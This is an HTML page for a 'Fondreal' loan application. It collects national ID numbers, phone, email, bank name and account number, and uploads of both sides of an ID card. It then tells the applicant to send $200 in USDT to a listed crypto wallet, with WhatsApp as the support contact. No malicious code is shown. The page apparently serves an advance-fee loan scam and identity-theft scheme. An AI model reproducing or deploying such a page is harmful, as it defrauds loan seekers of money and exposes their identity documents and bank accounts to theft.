
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Fondreal Loan Application</title>
  <script type="module" src="main.js"></script>
  <link rel="stylesheet" href="style.css" />
</head>
<body>
  <div class="container">
    <h1>Fondreal Loan Application Form</h1>
    <div id="auth-section">
      <h2>Sign Up / Login</h2>
      <input type="email" id="email" placeholder="Email" />
      <input type="password" id="password" placeholder="Password" />
      <button onclick="signUp()">Sign Up</button>
      <button onclick="login()">Login</button>
      <p id="user-status"></p>
    </div>

    <form id="loan-form" style="display:none">
      <h2>Section 1: Personal Info</h2>
      <input type="text" placeholder="Full Name" required />
      <input type="text" placeholder="Cédula" required />
      <input type="text" placeholder="Phone / WhatsApp" required />
      <input type="email" placeholder="Email" required />

      <h2>Section 2: Bank Info</h2>
      <input type="text" placeholder="Bank Name" required />
      <input type="text" placeholder="Account Number" required />

      <h2>Upload ID Documents</h2>
      <label>Front of ID:</label><input type="file" id="front-id" />
      <label>Back of ID:</label><input type="file" id="back-id" />

      <h2>Final Step</h2>
      <p>Send $200 USDT to: <strong>0x9eAd7D542e49F18F82b73dbFE3B08c9c0ca20d33</strong></p>

      <button type="submit">Submit Application</button>
    </form>

    <p>Contact Support: <a href="https://wa.me/15598940066" target="_blank">WhatsApp Chat</a></p>
  </div>
</body>
</html>
